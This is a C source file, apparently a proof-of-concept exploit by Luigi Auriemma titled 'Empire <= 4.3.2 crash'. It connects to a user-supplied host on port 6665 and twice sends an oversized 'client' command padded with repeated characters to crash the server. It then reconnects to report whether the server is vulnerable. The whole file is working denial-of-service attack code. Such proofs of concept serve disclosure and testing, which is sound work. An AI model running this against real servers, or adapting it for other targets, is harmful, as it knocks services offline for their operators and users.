/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1"
#define PORT        6665
#define BUFFSZ      4096
//#define LINESZ      127



void line_send(int sd, u_char *buff, u_char *cmd, ...);
int line_recv(int sd, u_char *buff, int size);
int mycpy(u_char *dst, u_char *src);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i;
    u_short port = PORT;
    u_char  buff[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Empire <= 4.3.2 crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect ...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" done\n");

    line_recv(sd, buff, sizeof(buff));
    printf("- %s\n", buff);

    for(i = 0; i < 2; i++) {
        printf("- send the big \"client\" command\n");
        line_send(
            sd,
            buff,
            "client",   // a total of 127 bytes automatically limited by the server
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
            "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            NULL);
    }

    printf("- wait some seconds:\n");
    for(i = 2; i; i--) {
        printf("%d\r", i);
        sleep(ONESEC);
    }

    close(sd);
    sleep(ONESEC);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }
    close(sd);
    return(0);
}



void line_send(int sd, u_char *buff, u_char *cmd, ...) {
    va_list ap;
    u_char  *s,
            *p;

    p = buff;
    p += mycpy(p, cmd);

    va_start(ap, cmd);
    while((s = va_arg(ap, u_char *))) {
        *p++ = ' ';
        p += mycpy(p, s);
    }
    va_end(ap);
    *p++ = '\n';

    if(send(sd, buff, p - buff, 0)
      < 0) std_err();
}



int line_recv(int sd, u_char *buff, int size) {
    int     t,
            len;

    for(len = 0, size--; size; size--, len++, buff++) {
        t = recv(sd, buff, 1, 0);
        if(t < 0) std_err();
        if(!t) break;
        if(*buff == '\n') break;
    }

    *buff = 0;
    return(len);
}



int mycpy(u_char *dst, u_char *src) {
    u_char *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p = 0;
    return(p - dst);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


